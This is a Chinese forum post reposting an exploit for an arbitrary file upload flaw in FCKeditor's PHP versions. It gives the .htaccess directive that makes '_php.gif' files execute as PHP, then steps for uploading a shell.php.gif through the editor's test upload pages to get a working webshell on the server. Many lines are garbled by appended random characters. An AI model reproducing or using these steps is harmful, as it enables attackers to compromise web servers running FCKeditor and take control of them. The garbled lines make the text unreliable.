找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2214|回复: 0
打印 上一主题 下一主题

FCKeditor所有php版本Upload上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-10-27 17:25:21 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
FCKeditor所有php版本Upload上传漏洞0 C' F0 [4 @" w# ?  Y- o% g9 C
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
1 F  I5 |7 R& @8 z1 M减小字体 增大字体
) B7 K* y# C4 K' n[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
' l; O2 u/ r) ?0 P- Y[+] Date: 20114 y7 w9 W' `  u8 s
[+] Author : sinesafe.cn) }0 F* {4 t6 ~
[+] Website : WwW.sinesafe.cn
' y4 }/ u; A) E) Q& m2 l———————————————————- X' J; {6 p) `% B
1.create a htaccess file:! d( |+ Z/ j" u5 {1 i+ W6 G
code:' n5 P5 P* O3 Q- R9 F, n+ X
<FilesMatch “_php.gif”>; Z/ t( ^9 |% p0 g
SetHandler application/x-httpd-php$ @# I; n7 u) I& \, f  W
</FilesMatch>
) S) s- p, `: B% j
0 n: m3 y3 L& Y; `2.Now upload this htaccess with FCKeditor.; J4 @$ p* g# g$ y# L! _4 m, P+ J
( K* B2 j2 p* I+ e  h6 o( |3 M
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html7 q1 E2 {: u! k) E; X/ V: Z) X

/ b% e$ i  c' S' Jhttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html
* s; x3 L& l, s2 S3 J
: @# X7 q$ f: w& R———————————————————————————————-
# }, ^$ n4 G- B/ t+ q/ l# e9 \3.Now upload shell.php.gif with FCKeditor.
$ Z7 h& M+ B+ Q: a  i" l% J4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.& W/ u" D" w) [7 U8 L3 G( T
5.http://www.sinesafe.cn/anything/shell_php.gif7 s" q7 r8 T: w+ U9 q( T
6.Now shell is available from server.
/ t: V: V# e# `" ^. U( c

" }) U, G' I3 n. V- e
: b3 r2 M1 c& N% }; X
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表